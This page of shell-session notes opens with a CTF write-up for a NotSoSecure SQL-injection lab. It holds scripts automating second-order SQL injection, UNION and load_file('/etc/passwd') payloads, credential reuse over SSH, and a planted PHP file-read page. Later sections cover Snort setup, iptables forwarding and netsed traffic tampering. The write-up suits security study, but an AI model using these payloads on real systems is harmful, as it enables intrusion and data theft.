# NotSoSecure CTF October 2k13


# curl --silent --request POST --data "myusername=mu&mypassword=mp" http://ctf.notsosecure.com/71367217217126217712/checklogin.php | xxd -p -r ; echo
secret_register.html
# cat console
#!/bin/bash
# Interactive helper used against the NotSoSecure CTF lab: each line typed at
# the "> " prompt is registered as an account name, used to log in, and the
# value the application then stores in the cookie jar "nss" is decoded and
# printed.
# The round trip returns data only because uber_secret.php (listed further
# down this page) concatenates the stored session username into its SQL
# without escaping and copies the first result column into a cookie; a
# parameterized query in that page removes the behaviour.

echo -n "> "
while read line; do 
 # Encode single quotes and spaces so the line can sit in a GET query string.
 username=`echo -n "$line" | sed -e "s/'/%27/g" -e 's/ /+/g'`
 # 1. Register the line as a new account name (fixed e-mail and password).
 curl --silent --cookie-jar nss --cookie nss --request GET "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=$username&regemail=mail&regpass1=pass&regpass2=pass" > /dev/null 2>&1
 # 2. Log in under the same name with the fixed password.
 curl --silent --cookie-jar nss --cookie nss --request POST --data "myusername=$line&mypassword=pass" "http://ctf.notsosecure.com/71367217217126217712/checklogin.php" > /dev/null 2>&1
 # 3. Request the page that looks the name up; its response sets a cookie.
 curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" > /dev/null 2>&1
 # Last line of the cookie jar = newest cookie; field 7 is the cookie value.
 osi=`tail -n1 nss | awk '{print $7}'`
 # Restore the URL-encoded "=" padding, then base64-decode the value.
 echo $osi | sed 's/%3D/=/g' | base64 -d ; echo
 echo -n "> "
done
# ./console
> ' and false union select table_name,null from information_schema.columns where table_schema not like '%_schema' and table_schema!='mysql' group by table_name limit 2,1 --
users
> ' and false union select column_name,null from information_schema.columns where table_name='users' limit 2,1 --
password
> ' and false union select password,null from users where name='admin' --
sqlilabRocKs!!
# curl --silent --cookie-jar nss --cookie nss --request POST --data 'myusername=admin&amypassword=sqlilabRocKs!!' "http://ctf.notsosecure.com/71367217217126217712/checklogin.php"
# curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" | grep -A 3 Success
   <h1>Success!</h1><br><a href='login.php'> click here to go back</a><br>
<div>Well done, Flag is 815290. 2nd flag is in file secret.txt</div>
<h3 class="h3_admin">You are Admin!</h3>
    <div><img src="images/login/smiley.gif"></div>
# cat secret
#!/bin/bash
# Variant of the "console" helper for the same CTF lab: the line typed at the
# prompt is treated as a file path on the database host, wrapped in a fixed
# load_file() username, and pushed through the same register / login / fetch
# round trip. The file content comes back base64-encoded in the cookie jar.
# Defender's note: load_file() only returns data when the application's MySQL
# account holds the FILE privilege and the server is allowed to read the
# path; a web application account normally needs neither.

echo -n "> "
while read line; do 
 # Echo the requested path back for the operator.
 echo "'$line'"
 # Fixed username template with the path substituted in.
 mu="' and false union select load_file('$line'),null -- 123"
 # Encode single quotes and spaces so the name can sit in a GET query string.
 username=`echo -n "$mu" | sed -e "s/'/%27/g" -e 's/ /+/g'`
 echo $username 
 # 1. Register the templated name (fixed e-mail and password).
 curl --silent --cookie-jar nss --cookie nss --request GET "http://ctf.notsosecure.com/71367217217126217712/register.php?regname=$username&regemail=mail&regpass1=pass&regpass2=pass" > /dev/null 2>&1
 # 2. Log in under that name with the fixed password.
 curl --silent --cookie-jar nss --cookie nss --request POST --data "myusername=$mu&mypassword=pass" "http://ctf.notsosecure.com/71367217217126217712/checklogin.php" > /dev/null 2>&1
 # 3. Request the page that looks the name up; its response sets a cookie.
 curl --silent --cookie-jar nss --cookie nss "http://ctf.notsosecure.com/71367217217126217712/uber_secret.php" > /dev/null 2>&1
 # Last line of the cookie jar = newest cookie; field 7 is the cookie value.
 osi=`tail -n1 nss | awk '{print $7}'`
 # Restore the URL-encoded "=" padding, then base64-decode the value.
 echo $osi | sed 's/%3D/=/g' | base64 -d ; echo
 echo -n "> "
done
# ./secret
> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
postgres:x:107:112:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
ctf:x:1000:1000:,,,:/home/ctf:/bin/bash
temp123:x:1001:1001:weakpassword1:/home/temp123:/bin/sh
ntop:x:108:116::/var/lib/ntop:/bin/false
# ssh temp123@ctf.notsosecure.com
temp123@ctf.notsosecure.com's password:weakpassword1
$ find / -name secret.txt 2> /dev/null
/tmp/secret.txt
/secret.txt
$ cat /tmp/secret.txt
n0th1ng to s33...
$ cat /secret.txt
cat: /secret.txt: Permission denied
$ ls -l /secret.txt
-r-------- 1 www-data www-data 684 Oct 25 07:46 /secret.txt
$ cat /home/temp123/.* | less
$ cd /var/www
$ ls -l
total 40
drwxr-xr-x 4 root root 4096 Oct 25 07:47 71367217217126217712
drwxr-xr-x 3 root root 4096 Oct  7 22:17 css
drwxr-xr-x 4 root root 4096 Oct  7 22:17 ctf
drwxr-xr-x 3 root root 4096 Oct  7 21:59 ctf-ver3
-rw-r--r-- 1 root root  894 Sep 12 08:20 favicon.ico
drwxr-xr-x 2 root root 4096 Oct  7 22:17 img
-rw-r--r-- 1 root root  177 Oct  4 19:43 _index.html
-rw-r--r-- 1 root root 3929 Oct  9 08:04 index.html
-rw-r--r-- 1 root root 2654 Oct  7 22:17 index.html.bak
drwxr-xr-x 4 root root 4096 Oct 27 10:03 leaderboard
$ cd 71367217217126217712
$ ls -l
total 60
-rw-r--r-- 1 root root 1327 Oct 25 07:41 checklogin.php
drwxr-xr-x 2 root root 4096 Oct 22 09:54 css
-rw-r--r-- 1 root root 1607 Oct 22 07:47 error.php
-rw-r--r-- 1 root root  894 Oct 22 02:04 favicon.ico
drwxr-xr-x 4 root root 4096 Oct 22 02:04 images
-rw-r--r-- 1 root root 2092 Oct 22 07:44 index.php
-rw-r--r-- 1 root root 2092 Oct 22 07:45 login.php
-rw-r--r-- 1 root root  991 Oct 22 08:16 _Logout.php
-rw-r--r-- 1 root root 1238 Oct 22 09:40 Logout.php
-rw-r--r-- 1 root root 3040 Oct 22 08:00 _register.php
-rw-r--r-- 1 root root 3060 Oct 25 07:47 register.php
-rw-r--r-- 1 root root 1745 Oct 22 07:53 _secret_register.html
-rw-r--r-- 1 root root 1882 Oct 23 14:26 secret_register.html
-rw-r--r-- 1 root root 3324 Oct 22 08:05 _uber_secret.php
-rw-r--r-- 1 root root 3316 Oct 25 07:47 uber_secret.php
$ cat uber_secret.php
<?php
// Gate for the page: visitors without a registered "myusername" session
// variable are redirected to the login form.
// error_reporting(0) hides every PHP warning and notice, including the ones
// the unquoted constant below would raise.
error_reporting(0);
session_start();
// NOTE(review): session_is_registered() was removed in PHP 5.4 and the name
// is passed as a bare constant; isset($_SESSION['myusername']) is the
// current form.
if(!session_is_registered(myusername)){
header("location:login.php");
die;
}
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>SQL</title>
<link rel="stylesheet" href="css/screen.css" type="text/css" media="screen" title="default" />

</head>
<body> 

<div id="page-top-outer">    

<div id="page-top">

 <div id="logo">
 </div>

 <div id="top-search">
  <table border="0" cellpadding="0" cellspacing="0">
  <tr>
  <td>
  <a href="Logout.php"><button>Logout</button></a>
  </td>
  </tr>
  </table>
 </div>

  <div class="clear"></div>

</div>
</div> 
<div class="clear"> </div><br />
<div class="clear"></div>
<div id="content-outer">
<div id="content">
 <div id="page-heading">
 </div>
<table border="0" width="100%" cellpadding="0" cellspacing="0" id="content-table">
 <tr>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowleft.jpg" width="20" height="300" alt="" /></th>
  <th class="topleft"></th>
  <td id="tbl-border-top"> </td>
  <th class="topright"></th>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowright.jpg" width="20" height="300" alt="" /></th>
 </tr>
 <tr>
  <td id="tbl-border-left"></td>
  <td>
  <div id="content-table-inner">

   <div id="table-content">
   <?php if($_SESSION['myusername']=='admin')
{?>
<h1>Success!</h1><br><a href='login.php'> click here to go back</a><br>
<div><?echo "Well done, Flag is 815290. 2nd flag is in file secret.txt";?></div>
<h3 class="h3_admin">You are Admin!</h3>
    <div><img src="images/login/smiley.gif"></div>
<?php }
 else { ?>
   <h3 class="h3_admin">You are not Admin!</h3>
    <div><img src="images/login/sad smiely.gif"></div>
   
   </div>
   <div style="padding-left:350px;font-weight:bold; font-size:20px;color:#92B22C;">
<?php
// Non-admin branch: look up the e-mail address of the logged-in user and
// hand it back to the browser in a cookie.
// NOTE(review): database credentials are hard-coded in the page source.
$host="localhost"; 
$username="2ndorder"; 
$password="2ndorder"; 
$db_name="2ndorder"; 
$tbl_name="users"; 
// NOTE(review): the mysql_* extension was removed in PHP 7; mysqli or PDO
// with prepared statements is the replacement.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

// NOTE(review): second-order SQL injection. The session username is
// concatenated into the statement without escaping or binding. register.php
// escapes the name when it inserts it, but the value stored (and presumably
// copied into the session by checklogin.php, which is not shown) is the raw
// string, quotes included, so it is interpreted as SQL here. Binding the
// name as a query parameter closes the hole.
$sql="SELECT email,name FROM $tbl_name WHERE name='".$_SESSION['myusername']." '";

$result=mysql_query($sql);
$row = mysql_fetch_row($result);
// First column of the first row: "email" in the intended query.
$login1=$row[0];

// The HTML output is encoded with htmlentities(); only the SQL above is not.
echo "Logged in as <b>".htmlentities($_SESSION['myusername'])."</b><br>";?> 
<?
// NOTE(review): whatever the query returned in column 0 is sent to the
// client base64-encoded (an encoding, not protection) in a cookie, which
// gives an injected query a direct output channel.
setcookie(session_id,base64_encode($login1));
?> 
</div>
 <?php } ?>
   <div class="clear"></div>
   
  </div>
  </td>
  <td id="tbl-border-right"></td>
 </tr>
 <tr>
  <th class="sized bottomleft"></th>
  <td id="tbl-border-bottom"> </td>
  <th class="sized bottomright"></th>
 </tr>
 </table>
 <div class="clear"> </div>
</div>
<div class="clear"> </div>
</div>
<div class="clear"> </div>
 
 <div class="footer">
  <ul>
   <li style="margin-top: 20px;">powered by</li>
   <li><a href="http://www.securitytube-training.com/virtual-labs/sql-injection-labs/">
    <img src="images/login/sql.jpg" class="img_login">
   </a></li>
   <li style="margin-top: 20px;">© NotSoSecure</li>
  </ul>
 </div>
</body>
</html>
$ cat register.php
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>SQLi labs</title>
<link rel="stylesheet" href="css/screen.css" type="text/css" media="screen" title="default" />
<link rel="shortcut icon" href="../favicon.ico">


</head>
<body> 

<div id="page-top-outer">    


<div id="page-top">

 
 <div id="logo">
 </div>

 
 
 <div id="top-search">
  <table border="0" cellpadding="0" cellspacing="0">
  <tr>
  <td>
  
  </td>
  </tr>
  </table>
 </div>
  
  <div class="clear"></div>

</div>

</div>
 
<div class="clear"> </div>
  <div class="clear"></div>
<div id="content-outer">
<div id="content">
 <div id="page-heading">
 </div>
 <table border="0" width="100%" cellpadding="0" cellspacing="0" id="content-table">
 <tr>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowleft.jpg" width="20" height="300" alt="" /></th>
  <th class="topleft"></th>
  <td id="tbl-border-top"> </td>
  <th class="topright"></th>
  <th rowspan="3" class="sized"><img src="images/shared/side_shadowright.jpg" width="20" height="300" alt="" /></th>
 </tr>
 <tr>
  <td id="tbl-border-left"></td>
  <td>
  <div id="content-table-inner">
   <div id="table-content">
   <?php
// Registration handler: requires all four reg* parameters, checks that the
// two passwords match, refuses a name that already exists, then inserts the
// new row into "users".
error_reporting(0);
// NOTE(review): the password travels in the GET query string, so it also
// lands in server logs and browser history; a POST body is the usual choice.
if($_GET["regname"] && $_GET["regemail"] && $_GET["regpass1"] && $_GET["regpass2"] )
{
if($_GET["regpass1"]==$_GET["regpass2"])
{
$servername="localhost";
$username="2ndorder";
// NOTE(review): database credentials are hard-coded in the page source.
$conn= mysql_connect($servername,$username,'2ndorder','2ndorder')or die(mysql_error());
mysql_select_db("2ndorder",$conn);
// Escaping protects this SELECT and the INSERT below, but the row keeps the
// name exactly as submitted (quotes included). Every later query that reuses
// the stored name has to bind or escape it again; uber_secret.php does not.
$sql1="select * from users where name ='".mysql_real_escape_string($_REQUEST['regname'])."'";
$result1=mysql_query($sql1);
$row1 = mysql_fetch_row($result1);
$count1=mysql_num_rows($result1);
if ($count1>0)
{
echo "<a href='login.php'>click here to login</a><br>";
die("User Already Exist");
}
// NOTE(review): the password is inserted as submitted; no hashing is visible
// in this file.
$sql="insert into users (name,email,password)values('".mysql_real_escape_string($_GET[regname])."','".mysql_real_escape_string($_GET[regemail])."','".mysql_real_escape_string($_GET[regpass1])."')";
// NOTE(review): die(mysql_error()) returns raw database error text to the
// client.
$result=mysql_query($sql,$conn) or die(mysql_error());
print "You have sucessfully registered!<br>";
print "<a href='login.php'>go to login page</a>";
}
else print "passwords don't match";
}
else { ?> <div class="register_invelid">Invaild data</div>
<?php }
?>
</div>
   <div class="clear"></div>
  </div>
  </td>
  <td id="tbl-border-right"></td>
 </tr>
 <tr>
  <th class="sized bottomleft"></th>
  <td id="tbl-border-bottom"> </td>
  <th class="sized bottomright"></th>
 </tr>
 </table>
 <div class="clear"> </div>

</div>
<div class="clear"> </div>

<div class="footer">
 <ul>
  <li style="margin-top: 20px;" >powered by</li>
  <li><a href="http://www.securitytube-training.com/virtual-labs/sql-injection-labs/">
   <img class="img_login" src="images/login/sql.jpg">
  </a></li>
  <li style="margin-top: 20px;">© NotSoSecure</li>
 </ul>
 
</div>
</div> 
</body>
</html>
$ apachectl -M
/usr/sbin/apachectl: 87: ulimit: error setting limit (Operation not permitted)
apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
Loaded Modules:
 core_module (static)
 log_config_module (static)
 logio_module (static)
 mpm_prefork_module (static)
 http_module (static)
 so_module (static)
 alias_module (shared)
 auth_basic_module (shared)
 authn_file_module (shared)
 authz_default_module (shared)
 authz_groupfile_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 cgi_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 mime_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 reqtimeout_module (shared)
 setenvif_module (shared)
 status_module (shared)
 userdir_module (shared)
Syntax OK
$ cat /etc/apache2/mods-enabled/userdir.conf
<IfModule mod_userdir.c>
        UserDir public_html
        UserDir disabled root

        <Directory /home/*/public_html>
                AllowOverride FileInfo AuthConfig Limit Indexes
                Options MultiViews Indexes SymLinksIfOwnerMatch IncludesNoExec
                <Limit GET POST OPTIONS>
                        Order allow,deny
                        Allow from all
                </Limit>
                <LimitExcept GET POST OPTIONS>
                        Order deny,allow
                        Deny from all
                </LimitExcept>
        </Directory>
</IfModule>
$ cd /home/temp123
$ mkdir public_html
$ vi index.php
<?php echo file_get_contents('/secret.txt');
<ESC>:wq
$ exit
# curl --silent http://ctf.notsosecure.com/~temp123/index.php
Well done, 2nd Flag is 128738213812990.

email both the flags to ctf@notsosecure.com with subject CTF FLAGS!

make sure you delete all the files you have created on the server so you dont allow other users easy points by using the files left by you on the server.

Please provide a detailed write up to qualify for cash prize!
The person with best write-up wins. You are allowed to publish the write-up on public site, but please do this after the CTF has finished (sunday, 27th October).

Hope you enjoyed the CTF. This was taken from one of challenges we have on SQLi Labs. To practice more on this visit our SQLi Labs.

The next public CTF will take place in December.

Thanks
Sid

# Vodafone 3G connection with wvdial


# # Modem: Huawei K3806
# cat /etc/wvdial.conf
[Dialer Defaults]
Phone = *99#
Username = vodafone
Password = vodafone
Stupid Mode = 1
Dial Command = ATDT

[Dialer pin]
Init1 = AT+CPIN=1234

[Dialer vodafone]
Modem = /dev/ttyUSB0
Baud = 460800
Init2 = ATZ
Init3 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Init5 =AT+CGDCONT=1,"IP","ac.vodafone.es"
ISDN = 0
Modem Type = Analog Modem
# wvdial pin vodafone

# Pulledpork installation and configuration


# apt-get install libcrypt-ssleay-perl liblwp-protocol-https-perl
# cd /usr/local/bin
# curl --silent --location --output pulledpork.pl http://pulledpork.googlecode.com/svn/trunk/pulledpork.pl
# vi pulledpork.pl
---
"$Snort_path -c $Snort_config --dump-dynamic-rules=$Sostubs 2>&1|"
+++
"$Snort_path -Q -c $Snort_config --dump-dynamic-rules=$Sostubs 2>&1|"
# chmod 755 pulledpork.pl
# mkdir /etc/pulledpork
# cd /etc/pulledpork
# sed -i '/^include $RULE_PATH/d' /usr/local/snort/etc/snort.conf
# echo "include \$RULE_PATH/snort.rules" >> /usr/local/snort/etc/snort.conf
# echo "include \$RULE_PATH/local.rules" >> /usr/local/snort/etc/snort.conf
# rm /usr/local/snort/rules/*.rules
# touch /usr/local/snort/rules/snort.rules
# touch /usr/local/snort/rules/local.rules
# touch /usr/local/snort/rules/white_list.rules
# cat pulledpork.conf
rule_url=https://www.snort.org/reg-rules/|snortrules-snapshot.tar.gz|<oinkcode>
rule_url=https://s3.amazonaws.com/snort-org/www/rules/community/|community-rules.tar.gz|Community
rule_url=http://labs.snort.org/feeds/ip-filter.blf|IPBLACKLIST|open
rule_url=https://www.snort.org/reg-rules/|opensource.gz|<oinkcode>
rule_url=https://rules.emergingthreatspro.com/|emerging.rules.tar.gz|open
ignore=deleted.rules,experimental.rules,local.rules
temp_path=/tmp
rule_path=/usr/local/snort/rules/snort.rules
local_rules=/usr/local/snort/rules/local.rules
sid_msg=/usr/local/snort/etc/sid-msg.map
sid_msg_version=1
sid_changelog=/var/log/snort/sid_changes.log
sorule_path=/usr/local/snort/lib/snort_dynamicrules
snort_path=/usr/local/snort/bin/snort
config_path=/usr/local/snort/etc/snort.conf
# Ubuntu-8.04, Ubuntu-10-4
distro=Ubuntu-12-04
black_list=/usr/local/snort/rules/black_list.rules
IPRVersion=/usr/local/snort/rules/iplists
#snort_control=/usr/local/bin/snort_control
version=0.7.0
# pulledpork.pl -c /etc/pulledpork/pulledpork.conf

# Combinatoric generator


# cat combgen
#!/usr/bin/python

# Combinatoric generator

from sys import argv
from itertools import combinations, permutations, product

# Command line: combgen <combination|permutation|product> <r> <item> [<item> ...]
# NOTE(review): an invocation with fewer than two arguments raises IndexError
# on these lines, before the usage text in help() can be shown.
f=argv[1]        # mode keyword
r=int(argv[2])   # length of each generated tuple
n=argv[3::]      # the items to combine (list of strings)

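def doprint(r):
        """Print every tuple produced by the iterable ``r`` on its own line.

        The items of a tuple are written separated by single spaces; an
        empty tuple produces an empty line.
        """
        for i in r:
                # A single parenthesised print per row is valid under both
                # Python 2 and Python 3 and writes the same text as the
                # former "print j," / bare "print" pair.
                print(' '.join(str(j) for j in i))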

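def calc_combination(n,r):
        """Return the number of ``r``-item combinations of the items in ``n``.

        ``n`` is the sequence of items (only its length is used) and ``r``
        the size of each combination.  The result matches the number of
        tuples ``itertools.combinations(n, r)`` yields, which is 0 when
        ``r`` is larger than ``len(n)``.
        """
        ln=len(n)
        # Out-of-range r: itertools yields nothing, so report 0 rather than
        # a count derived from factorials of a negative range.
        if r < 0 or r > ln:
                return 0
        total=1
        for i in range(r):
                # Multiply before dividing: the running product of i+1
                # consecutive integers is always divisible by (i+1), so the
                # floor division is exact under Python 2 and 3 alike.
                total=total*(ln-i)//(i+1)
        return total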

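def calc_permutation(n,r):
        """Return the number of ``r``-item permutations of the items in ``n``.

        ``n`` is the sequence of items (only its length is used) and ``r``
        the length of each permutation.  The result matches the number of
        tuples ``itertools.permutations(n, r)`` yields, which is 0 when
        ``r`` is larger than ``len(n)``.
        """
        ln=len(n)
        # Out-of-range r: itertools yields nothing.  Without this guard a
        # too-large r would report len(n)! because the divisor loop would
        # run over an empty range.
        if r < 0 or r > ln:
                return 0
        total=1
        # len(n)! / (len(n)-r)! written as the product of its r leading
        # factors, which needs no division at all.
        for i in range(r):
                total=total*(ln-i)
        return total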

def calc_product(n,r):
        """Return how many tuples ``itertools.product(n, repeat=r)`` yields:
        the number of items in ``n`` raised to the power ``r``."""
        return pow(len(n), r)

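def help():
        """Print the one-line usage summary to standard output."""
        # Parenthesised single-argument print: parses under Python 2 and 3
        # and writes the same text in both.
        print("Usage: combgen <combination|permutation|product> <r> <n>")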

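# Dispatch on the requested mode: print the expected number of results
# first, then every generated tuple.  Any other keyword shows the usage line.
# Each print takes one pre-formatted string so the statements parse under
# both Python 2 and Python 3; the text written is the same as before,
# including the double space after "Combinations =".
if f == 'combination':
        print("Combinations =  %s" % calc_combination(n,r))
        doprint(combinations(n,r))
elif f == 'permutation':
        print("Permutations = %s" % calc_permutation(n,r))
        doprint(permutations(n,r))
elif f == 'product':
        print("Products = %s" % calc_product(n,r))
        doprint(product(n,repeat=r))
else:
        help()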

# forwarder: forward all incoming connections to other host


# cat forwarder
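#!/bin/bash
#
# forwarder: send connections that <source> makes to <listener> on to
# <target>, using a DNAT/SNAT rule pair in the iptables nat table.
#
# Usage: forwarder <start|stop> <source> <listener> <target>
#        forwarder <status|clean>
#
# Needs root. Caveats worth knowing before running it:
#   - "start" turns on IPv4 forwarding for the whole host and "stop" does
#     not turn it off again.
#   - "clean" flushes the entire nat table, including rules this script did
#     not add.

action="$1"
source="$2"
listener="$3"
target="$4"

# The command prefix is an array so every word stays one argument without
# relying on word splitting of an unquoted string.
nat=(iptables --table nat)

# Print the usage text on stderr and stop with a non-zero status.
usage() {
        printf 'Usage: %s <start|stop> <source> <listener> <target>\n' "${0##*/}" >&2
        printf '       %s <status|clean>\n' "${0##*/}" >&2
        exit 2
}

# start/stop need all three addresses; an empty one would otherwise be
# passed to iptables as a missing option value.
require_addresses() {
        [[ -n "$source" && -n "$listener" && -n "$target" ]] || usage
}

# Add (--append) or remove (--delete) the rule pair. $1 is the iptables
# operation; the rule specification is the same in both cases.
rule_pair() {
        local op="$1"
        "${nat[@]}" "$op" PREROUTING \
                --source "$source" --destination "$listener" \
                --jump DNAT --to-destination "$target"
        "${nat[@]}" "$op" POSTROUTING \
                --source "$source" --destination "$target" \
                --jump SNAT --to-source "$listener"
}

case "$action" in
start)
        require_addresses
        echo 1 > /proc/sys/net/ipv4/ip_forward
        rule_pair --append
        ;;
stop)
        require_addresses
        rule_pair --delete
        ;;
status)
        "${nat[@]}" --numeric --list --line-numbers
        ;;
clean)
        "${nat[@]}" --flush
        ;;
*)
        # Unknown or missing action: say so instead of exiting silently.
        usage
        ;;
esac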
# ./forwarder start 192.168.1.1 192.168.1.2 8.8.8.8

# netsed: modify network packets on-the-fly


Bridge mode

# # eth0 = outside & eth1 = inside
# ifconfig eth0 promisc up
# ifconfig eth1 promisc up
# brctl addbr br0
# brctl addif br0 eth0 eth1
# ifconfig br0 192.168.1.111/24 up
# iptables --table nat -A PREROUTING --match physdev --physdev-in eth0 --source 192.168.1.0/24 --protocol tcp --dport 80 --jump REDIRECT --to-port 1080
# # --match physdev --physdev-in eth0 | --in-interface br0
# netsed tcp 1080 0 0 's/Accept-Encoding/4ccept-Encoding' 's/Never/Forever'
Host mode

# iptables --table nat -A PREROUTING --in-interface eth0 --source 192.168.1.0/24 --protocol tcp --dport 80 --jump REDIRECT --to-port 1080
# netsed tcp 1080 0 0 's/Accept-Encoding/4ccept-Encoding' 's/Never/Forever'

# Snort IPS: afpacket and nfq


# apt-get install build-essential
# apt-get install bison flex
# apt-get install libpcap-dev
# apt-get install libpcre3-dev
# apt-get install libnet1-dev
# apt-get install zlib1g-dev
# apt-get install libnetfilter-queue-dev # daq: nfq

# curl --silent --location --output libdnet-1.12.tgz http://libdnet.googlecode.com/files/libdnet-1.12.tgz
# tar xvzf libdnet-1.12.tgz
# cd libdnet-1.12
# ./configure "CFLAGS=-fPIC -g -O2"
# make
# make install
# ln -s /usr/local/lib/libdnet.1.0.1 /usr/lib/libdnet.1
# cd ..

# curl --silent --location --output daq-2.0.1.tar.gz https://www.snort.org/downloads/2546
# tar xvzf daq-2.0.1.tar.gz
# cd daq-2.0.1
# ./configure
# make
# make install
# cd ..

# curl --silent --location --output snort-2.9.5.3.tar.gz https://www.snort.org/downloads/2485
# tar xvzf snort-2.9.5.3.tar.gz
# cd snort-2.9.5.3
# ./configure --prefix=/usr/local/snort --enable-sourcefire
# make
# make install
# cd ..

# mkdir /var/log/snort
# groupadd snort
# useradd -g snort snort
# chown snort:snort /var/log/snort

# curl --silent --location --output snortrules-snapshot-2953.tar.gz http://www.snort.org/reg-rules/snortrules-snapshot-2953.tar.gz/<oinkcode>
# tar xvzf snortrules-snapshot-2953.tar.gz -C /usr/local/snort
# mkdir /usr/local/snort/lib/snort_dynamicrules
# cp /usr/local/snort/so_rules/precompiled/Ubuntu-12-04/x86-64/2.9.5.3/* /usr/local/snort/lib/snort_dynamicrules/.
# touch /usr/local/snort/rules/white_list.rules
# touch /usr/local/snort/rules/black_list.rules
# ldconfig

# vi /usr/local/snort/etc/snort.conf
---
var WHITE_LIST_PATH ../rules
var BLACK_LIST_PATH ../rules
+++
var WHITE_LIST_PATH /usr/local/snort/rules
var BLACK_LIST_PATH /usr/local/snort/rules

---
dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/
dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so
dynamicdetection directory /usr/local/lib/snort_dynamicrules
+++
dynamicpreprocessor directory /usr/local/snort/lib/snort_dynamicpreprocessor/
dynamicengine /usr/local/snort/lib/snort_dynamicengine/libsf_engine.so
dynamicdetection directory /usr/local/snort/lib/snort_dynamicrules

# ifconfig eth0 promisc up
# ifconfig eth1 promisc up
afpacket (L2)
# vi /usr/local/snort/etc/snort.conf
+++
config daq: afpacket
config daq_mode: inline

# /usr/local/snort/bin/snort -m 027 -d -l /var/log/snort -u snort -g snort -c /usr/local/snort/etc/snort.conf -Q -i eth0:eth1 -S HOME_NET=[192.168.1.0/24]
nfq (L3)
# vi /usr/local/snort/etc/snort.conf
+++
config daq: nfq
config daq_mode: inline
config daq_var: queue=0

# iptables --append FORWARD --jump NFQUEUE --queue-num 0
# /usr/local/snort/bin/snort -m 027 -d -l /var/log/snort -u snort -g snort -c /usr/local/snort/etc/snort.conf -Q -S HOME_NET=[192.168.1.0/24]

# W0PR wargame


# curl --silent --output wargame.html http://w0pr.net
# sed -n 's/.*<script>\(.*\)<\/script>.*/\1/p' wargame.html > source.js
# cat dehieroglyphy
#!/bin/bash

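# File holding the hieroglyphy-encoded JavaScript; it is left untouched.
ifile="${1:?usage: dehieroglyphy <encoded-js-file>}"
# Working copy that the sed -i commands further down rewrite in place.
ofile="$ifile.decoded"

# Quoted so a path with spaces stays one argument, and "--" so a name that
# starts with "-" is not read as a cp option. Stop if the copy fails rather
# than running sed against a file that does not exist.
cp -- "$ifile" "$ofile" || exit 1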

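# Print the arguments, joined by single spaces, with "[", "]" and spaces
# backslash-escaped so the text can be used as a literal on the pattern side
# of a sed s/// command.
# Other sed metacharacters ("/", ".", "*", "\", "^", "$") are NOT escaped;
# the expressions this script feeds in do not contain them.
function escape(){
        # printf with a quoted "$*" instead of an unquoted echo: the text is
        # not glob-expanded against the current directory a second time, and
        # an argument such as "-n" is printed rather than taken as an option.
        printf '%s\n' "$*" | sed -e 's/\[/\\[/g' -e 's/\]/\\]/g' -e 's/ /\\ /g'
}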

# Lookup table of the JavaScript type-coercion expressions that stand for
# each digit and character in the encoded source. Nothing is evaluated here:
# these are plain strings that are later matched textually with sed.

# Digits as numbers: +[] is 0, and each further !![] (true) adds 1.
number_0='+[]'
number_1='+!![]'
number_2='!+[]+!![]'
number_3='!+[]+!![]+!![]'
number_4='!+[]+!![]+!![]+!![]'
number_5='!+[]+!![]+!![]+!![]+!![]'
number_6='!+[]+!![]+!![]+!![]+!![]+!![]'
number_7='!+[]+!![]+!![]+!![]+!![]+!![]+!![]'
number_8='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'
number_9='!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]'

# Digits as one-character strings: (number+[]) coerces the number to text.
character_0="($number_0+[])"
character_1="($number_1+[])"
character_2="($number_2+[])"
character_3="($number_3+[])"
character_4="($number_4+[])"
character_5="($number_5+[])"
character_6="($number_6+[])"
character_7="($number_7+[])"
